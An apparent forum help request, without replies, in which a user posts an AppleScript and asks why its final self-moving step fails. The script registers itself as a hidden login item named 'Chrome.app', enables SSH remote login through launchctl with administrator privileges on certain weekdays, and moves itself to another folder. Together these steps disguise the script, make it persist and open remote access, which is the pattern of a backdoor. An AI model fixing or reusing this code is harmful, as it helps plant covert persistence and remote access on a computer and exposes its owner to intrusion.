Looks like no one’s replied in a while. To start the conversation again, simply ask a new question.

Question:

Question: I need help moving items with Applescript

So I made a part of a script that is supposed to make itself move to a specific folder. I made it on a blank script and ran it and it worked fine, but when I put it in my main script it doesn't work for some reason. Here is my script (Only the last bit doesn't work.):

-------------------------------------------------------------------------------- -----------

--------------------------------Putting inside Loggin Items-----------------------------

set myPath to path to me

tell application "System Events"

makenewlogin itemat end of login itemswith properties {name:"Chrome.app", path:myPath, hidden:true}

end tell

-------------------------------------------------------------------------------- -----------

--------------------------------Turning on RemoteLogin--------------------------------

on remoteLogin(value)

do shell script "launchctl " & value & " -w /System/Library/LaunchDaemons/ssh.plist" with administrator privileges

end remoteLogin

if weekday of (current date) is in {Sunday, Monday} then

remoteLogin("load")

else

return "not Sunday or Monday"

end if

-------------------------------------------------------------------------------- -------

------------------------------------Moving Script------------------------------------

set thePath to POSIX path of (path to me astext)

do shell script "mv " & thePath & " ~/Desktop/script"

Posted on

Page content loaded

There are no replies.
User profile for user: Dv3v

Question: I need help moving items with Applescript